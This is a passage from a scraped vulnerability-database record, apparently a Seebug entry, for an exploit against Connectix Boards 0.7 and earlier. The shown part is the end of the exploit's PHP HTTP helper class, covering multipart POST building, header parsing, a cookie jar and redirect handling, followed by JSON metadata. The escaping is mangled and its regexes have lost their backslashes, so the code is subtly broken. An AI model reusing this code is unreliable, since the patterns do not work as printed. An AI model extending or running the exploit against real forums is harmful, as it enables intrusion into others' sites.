\\\"\r\n\r\n\\\".$value.\\\"\r\n\\\";\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->data .= \\\" filename=\\\"\\\".$array[$key][frmdt_filename].\\\"\\\";\r\n\\\";\r\n\t\t\t\t\tif(isset($array[$key][frmdt_type])) $this->data .= \\\"Content-Type: \\\".$array[$key][frmdt_type].\\\"\r\n\\\";\r\n\t\t\t\t\tif(isset($array[$key][frmdt_transfert])) $this->data .= \\\"Content-Transfer-Encoding: \\\".$array[$key][frmdt_transfert].\\\"\r\n\\\";\r\n\t\t\t\t\t$this->data .= \\\"\r\n\\\".$array[$key][frmdt_content].\\\"\r\n\\\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\t$this->data .= \\\"-----------------------------\\\".$this->boundary.\\\"--\r\n\\\";\r\n\t\treturn $this->sock();\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the content of the server response\r\n\t * without the headers.\r\n\t * \r\n\t * $this->getcontent($this->get(\\\"http://localhost/\\\"));\r\n\t * or\r\n\t * $this->getcontent();\r\n\t *\r\n\t * @param string $server_response\r\n\t * @return $onlythecontent\r\n\t */\r\n\tpublic function getcontent($code=\\'\\')\r\n\t{\r\n\t\tif(empty($code)) $code = $this->recv;\r\n\t\t$content = explode(\\\"\r\n\\\",$code);\r\n\t\t$onlycode = \\'\\';\r\n\t\tfor($i=1;$i<count($content);$i++)\r\n\t\t{\r\n\t\t\tif(!preg_match(\\\"/^(S*):/\\\",$content[$i])) $ok = 1;\r\n\t\t\tif($ok) $onlycode .= $content[$i].\\\"\r\n\\\";\r\n\t\t}\r\n\t\treturn $onlycode;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the headers of the server response\r\n\t * without the content.\r\n\t * \r\n\t * $this->getheader($this->post(\\\"http://localhost/x.php\\\",\\\"x=1&z=2\\\"));\r\n\t * or\r\n\t * $this->getheader();\r\n\t *\r\n\t * @param string $server_response\r\n\t * @return $onlytheheaders\r\n\t */\r\n\tpublic function getheader($code=\\'\\')\r\n\t{\r\n\t\tif(empty($code)) $code = $this->recv;\r\n\t\t$header = explode(\\\"\r\n\\\",$code);\r\n\t\t$onlyheader = $header[0].\\\"\r\n\\\";\r\n\t\tfor($i=1;$i<count($header);$i++)\r\n\t\t{\r\n\t\t\tif(!preg_match(\\\"/^(S*):/\\\",$header[$i])) break;\r\n\t\t\t$onlyheader .= $header[$i].\\\"\r\n\\\";\r\n\t\t}\r\n\t\treturn $onlyheader;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function is called by the cookiejar() function.\r\n\t * It adds the value of the \\\"Set-Cookie\\\" header in the \\\"Cookie\\\"\r\n\t * header for the next request. You don\\'t have to call it.\r\n\t * \r\n\t * @param string $server_response\r\n\t */\r\n\tprivate function getcookie($code)\r\n\t{\r\n\t\t$carr = explode(\\\"\r\n\\\",str_replace(\\\"\r\n\\\",\\\"\r\n\\\",$code));\r\n\t\tfor($z=0;$z<count($carr);$z++)\r\n\t\t{\r\n\t\t\tif(preg_match(\\\"/set-cookie: (.*)/i\\\",$carr[$z],$cookarr))\r\n\t\t\t{\r\n\t\t\t\t$cookie[] = preg_replace(\\\"/expires=(.*)(GMT||UTC)(S*)$/i\\\",\\\"\\\",preg_replace(\\\"/path=(.*)/i\\\",\\\"\\\",$cookarr[1]));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfor($i=0;$i<count($cookie);$i++)\r\n\t\t{\r\n\t\t\tpreg_match(\\\"/(S*)=(S*)(|;)/\\\",$cookie[$i],$matches);\r\n\t \t $cookn = $matches[1];\r\n\t \t $cookv = $matches[2];\r\n\t \t $this->addcookie($cookn,$cookv);\r\n\t\t}\r\n }\r\n\r\n\t\r\n\t/**\r\n\t * This function is called by the get()/post() functions.\r\n\t * You don\\'t have to call it.\r\n\t *\r\n\t * @param string $urltarg\r\n\t */\r\n\tprivate function target($urltarg)\r\n\t{\r\n\t\tif(!preg_match(\\\"/^http://(.*)//\\\",$urltarg)) $urltarg .= \\\"/\\\";\r\n\t\t$this->url=$urltarg;\r\n\t\t\r\n\t\t$array = explode(\\\"/\\\",str_replace(\\\"http://\\\",\\\"\\\",preg_replace(\\\"/:(d+)/\\\",\\\"\\\",$urltarg)));\r\n\t\t$this->host=$array[0];\r\n\r\n\t\tpreg_match(\\\"/:(d+)//\\\",$urltarg,$matches);\r\n\t\t$this->port=empty($matches[1]) ? 80 : $matches[1];\r\n\t\t\r\n\t\t$temp = str_replace(\\\"http://\\\",\\\"\\\",preg_replace(\\\"/:(d+)/\\\",\\\"\\\",$urltarg));\r\n\t\tpreg_match(\\\"//(.*)//\\\",$temp,$matches);\r\n\t\t$this->path=str_replace(\\\"//\\\",\\\"/\\\",\\\"/\\\".$matches[1].\\\"/\\\");\r\n\t\r\n\t\tif($this->port > 65535) die(\\\"Error: Invalid port number\\\");\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * If you call this function, the script will\r\n\t * extract all \\\"Set-Cookie\\\" headers values\r\n\t * and it will automatically add them into the \\\"Cookie\\\" header\r\n\t * for all next requests.\r\n\t *\r\n\t * $this->cookiejar(1); // enabled\r\n\t * $this->cookiejar(0); // disabled\r\n\t * \r\n\t */\r\n\tpublic function cookiejar($code)\r\n\t{\r\n\t\tif($code===0) $this->cookiejar=\\'\\';\r\n\t\tif($code===1) $this->cookiejar=1;\r\n\t\telse\r\n\t\t{\r\n\t\t\t$this->getcookie($code);\r\n\t\t}\r\n\t}\r\n\r\n\r\n\t/**\r\n\t * If you call this function, the script will\r\n\t * follow all redirections sent by the server.\r\n\t * \r\n\t * $this->allowredirection(1); // enabled\r\n\t * $this->allowredirection(0); // disabled\r\n\t * \r\n\t * @return $this->get($locationresponse)\r\n\t */\r\n\tpublic function allowredirection($code)\r\n\t{\r\n\t\tif($code===0) $this->allowredirection=\\'\\';\r\n\t\tif($code===1) $this->allowredirection=1;\r\n\t\telse\r\n\t\t{\r\n\t\t\tif(preg_match(\\\"/(location|content-location|uri): (.*)/i\\\",$code,$codearr))\r\n\t\t\t{\r\n\t\t\t\t$location = str_replace(chr(13),\\'\\',$codearr[2]);\r\n\t\t\t\tif(!eregi(\\\"://\\\",$location))\r\n\t\t\t\t{\r\n\t\t\t\t\treturn $this->get(\\\"http://\\\".$this->host.$this->path.$location);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\treturn $this->get($location);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\treturn $code;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function allows you to reset some parameters:\r\n\t * \r\n\t * $this->reset(header); // headers cleaned\r\n\t * $this->reset(cookie); // cookies cleaned\r\n\t * $this->reset(); // clean all parameters\r\n\t *\r\n\t * @param string $func\r\n\t */\r\n\tpublic function reset($func=\\'\\')\r\n\t{\r\n\t\tswitch($func)\r\n\t\t{\r\n\t\t\tcase \\\"header\\\":\r\n\t\t\t$this->header=\\'\\';\r\n\t\t\tbreak;\r\n\t\t\t\r\n\t\t\tcase \\\"cookie\\\":\r\n\t\t\t$this->cookie=\\'\\';\r\n\t\t\tbreak;\r\n\t\t\t\r\n\t\t\tdefault:\r\n\t\t $this->cookiejar=\\'\\';\r\n\t\t $this->header=\\'\\';\r\n\t\t $this->cookie=\\'\\';\r\n\t\t $this->allowredirection=\\'\\'; \r\n\t\t $this->agent=\\'\\';\r\n\t\t break;\r\n\t\t}\r\n\t}\r\n}\r\n?>\r\n\r\n \n ", "id": "SSV:6248", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:09:18", "reporter": "Root", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645442255, "score": 1659785532, "epss": 1678851499}}
{}
Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit